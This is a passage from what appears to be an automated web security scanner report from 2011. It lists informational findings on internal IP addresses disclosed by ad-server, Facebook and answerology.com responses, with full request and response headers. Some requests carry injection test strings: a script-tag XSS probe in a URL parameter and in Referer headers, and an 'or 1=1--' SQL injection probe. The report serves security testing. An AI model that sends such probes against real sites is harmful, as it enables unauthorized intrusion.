GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:55 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=oBL6Y9wdWQQ0caaMbSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:14 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
22.19. http://hfm.checkm8.com/adam/detected  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:10 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=orY5Y9wQKLW1caa4cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:29 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
22.20. http://hfm.checkm8.com/dispatcher_scripts/browserDataDetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /dispatcher_scripts/browserDataDetect.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /dispatcher_scripts/browserDataDetect.js?Ver=97 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:52 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
ETag: "1315710718"
Last-Modified: Sun, 11-Sep-2011 03:11:58 GMT
Age: 0
Cache-Control: max-age=50000000
Vary: Accept-Encoding
Content-Length: 5336
Connection: close
Content-Type: application/javascript

(function()
{
   // ActiveX parts compiled from http://www.builtfromsource.com/category/code/
   var r;
   function conv(v)
   {
       v = parseInt(v);
       if (! isNaN(v))
           r = Math.max(r, v);
   }

   var
...[SNIP]...
22.21. http://hfm.checkm8.com/dispatcher_scripts/browserDataDetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /dispatcher_scripts/browserDataDetect.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /dispatcher_scripts/browserDataDetect.js?Ver=97 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:09 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
ETag: "1315710718"
Last-Modified: Sun, 11-Sep-2011 03:11:58 GMT
Age: 0
Cache-Control: max-age=50000000
Vary: Accept-Encoding
Content-Length: 5336
Connection: close
Content-Type: application/javascript

(function()
{
   // ActiveX parts compiled from http://www.builtfromsource.com/category/code/
   var r;
   function conv(v)
   {
       v = parseInt(v);
       if (! isNaN(v))
           r = Math.max(r, v);
   }

   var
...[SNIP]...
22.22. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.ak.fbcdn.net
Path:   /static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif HTTP/1.1
Host: profile.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/fan.php?id=31818566964&width=300&connections=10&stream=false&header=true&locale=en_US

Response

HTTP/1.1 200 OK
Content-Length: 508
Content-Type: image/gif
Last-Modified: Mon, 04 Jul 2011 08:53:03 GMT
X-FB-Server: 10.138.17.185
Cache-Control: public, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:01 GMT
Date: Sat, 17 Sep 2011 16:35:01 GMT
Connection: close

GIF89a2.2...............................................................................................................................................................................................
...[SNIP]...
22.23. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.ak.fbcdn.net
Path:   /static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif HTTP/1.1
Host: profile.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/fan.php?id=31818566964&width=300&connections=10&stream=false&header=true&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 508
Content-Type: image/gif
Last-Modified: Mon, 04 Jul 2011 08:53:03 GMT
X-FB-Server: 10.138.64.185
Cache-Control: public, max-age=1209600
Expires: Sat, 01 Oct 2011 16:25:18 GMT
Date: Sat, 17 Sep 2011 16:25:18 GMT
Connection: close

GIF89a2.2...............................................................................................................................................................................................
...[SNIP]...
22.24. http://static.ak.connect.facebook.com/connect.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=0&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "99efa0dca8dd332f11f8176ad4e2ad6c"
X-FB-Server: 10.27.97.120
X-Cnection: close
Content-Length: 18454
Cache-Control: public, max-age=216
Expires: Sat, 17 Sep 2011 16:29:25 GMT
Date: Sat, 17 Sep 2011 16:25:49 GMT
Connection: close
Vary: Accept-Encoding

/*1315960254,169566584,JIT Construction: v440498,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
22.25. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/XdCommReceiver.js HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/xd_receiver.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 3386
Vary: Accept-Encoding
Cache-Control: max-age=987077
Expires: Thu, 29 Sep 2011 02:37:07 GMT
Date: Sat, 17 Sep 2011 16:25:50 GMT
Connection: close

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...
22.26. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/zZEOQP4uOC1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yx/r/zZEOQP4uOC1.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yx/r/zZEOQP4uOC1.gif HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Fri, 01 Jul 2011 01:41:59 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2324
Vary: Accept-Encoding
Cache-Control: public, max-age=26816649
Expires: Tue, 24 Jul 2012 01:39:10 GMT
Date: Sat, 17 Sep 2011 16:35:01 GMT
Connection: close

GIF89aZ."....Tn.Gc.......az.......C`..........Rm....u...........Vp.<Z....]v....g~..........=Z.............[t.Sm.............p..@^.Jf....Qk....=[....`x.Lg..........Fb..........Hd.Yr....Ni.Wp.o.....Mh..
...[SNIP]...
22.27. http://www.answerology.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:18 GMT
Content-Length: 58941
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Relationship Advice - Get Answers to Relationship Questions</title>
<meta name="
...[SNIP]...
<!-- 172.20.65.105 9/17/2011 12:24:30 PM -->
...[SNIP]...
22.28. http://www.answerology.com/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /N

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.answerology.com

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:33:23 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<!-- 172.20.65.108 9/17/2011 12:33:23 PM -->
...[SNIP]...
22.29. http://www.answerology.com/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /N

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.answerology.com

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:35:56 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<!-- 172.20.65.105 9/17/2011 12:35:55 PM -->
...[SNIP]...
22.30. http://www.answerology.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /index.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.aspx?template=about_our_ads.ascx HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; __utmv=191590138.null%3Alogged%20out; __utmb=191590138; rsi_segs=; s_cc=true; neworold=8; s_lastvisit=1316295024089; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_nr=1316295025109; hm_neworold=New; s_pv=Answerology%3A%20error; s_ppv=0; s_sq=hmagglobal%2Chmaganswerology%3D%2526pid%253DAnswerology%25253A%252520error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.answerology.com/index.aspx%25253Ftemplate%25253Dabout_our_ads.ascx%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:22 GMT
Content-Length: 11038
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>About Our Ads - Ask and answer questions anonymously on any topic.</title>
<meta
...[SNIP]...
<!-- 172.20.65.108 9/17/2011 12:43:22 PM -->
...[SNIP]...
22.31. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /uploaded-images/801818/40x37_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /uploaded-images/801818/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:47 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<!-- 172.20.65.105 9/17/2011 12:27:47 PM -->
...[SNIP]...
22.32. http://www.answerology.com/uploaded-images/807708/40x37_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /uploaded-images/807708/40x37_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /uploaded-images/807708/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:46 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<!-- 172.20.65.105 9/17/2011 12:27:46 PM -->
...[SNIP]...
22.33. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.217.36
X-Cnection: close
Date: Sat, 17 Sep 2011 16:44:43 GMT
Content-Length: 1075

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/
...[SNIP]...
22.34. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.18.50
X-Cnection: close
Date: Sat, 17 Sep 2011 16:51:47 GMT
Content-Length: 1075

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/
...[SNIP]...
22.35. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=217130754993329&app_id=217130754993329&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a1b401bc%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff38ae258cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16746cfb4%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff38ae258cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33f7cb634%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc96e1d38%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff38ae258cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33f7cb634&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1325bcd04%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff38ae258cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33f7cb634&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df397b96168%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff38ae258cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33f7cb634&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
